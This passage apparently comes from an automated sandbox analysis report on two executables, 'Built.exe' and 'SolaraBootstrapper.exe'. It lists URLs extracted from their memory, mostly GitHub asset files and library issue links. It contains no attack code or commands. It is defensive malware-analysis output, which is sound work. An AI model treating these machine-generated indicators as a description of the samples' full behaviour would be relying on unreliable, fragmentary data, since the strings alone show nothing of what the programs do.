Source: Built.exe, 00000003.00000003.1703569315.000001D5E2E66000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2042088940.000001D5E4C20000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1707526751.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1709356922.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703484396.000001D5E4C21000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703747283.000001D5E2E6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/topics
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/trending
Source: Built.exe, 00000003.00000002.2053069084.000001D5E5520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: Built.exe, 00000003.00000003.1829183709.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1856705420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2046197420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_g
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-type
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-78ce1c87
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/behaviors-eea438ad0058.js
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark-6b1e37da2254.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-a4629b2e906
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-a4629b2e906b.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-f4daad25d8cf.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-1911f0cf0db4.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/element-registry-d3ba3606e12c.js
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/environment-bcaf5ff1a8f7.js
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/error-add24e2c1056.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-a1c8541470fb.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-elements-7505bd7456d8.js
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-mark-57519b92ca4e.png
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/global-9e9ac94b9f81.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-12eb51662ed7.js
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/light-efd2f2257c96.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/light_colorblind-afcc3a6a38dd.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-79bca7145393.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/mona-sans-d1bf285e9b9b.woff2
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/notifications-global-957ece5a6535.js
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/primer-38e58d71ea15.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/primer-primitives-8500c2c7ce5f.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/react-lib-7b7b5264f6c1.js
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/sessions-4426dd0b720e.js
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/site-73c81d16a7dd.css
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-cd36524126
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_session-resume_dist_index_js-node
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_
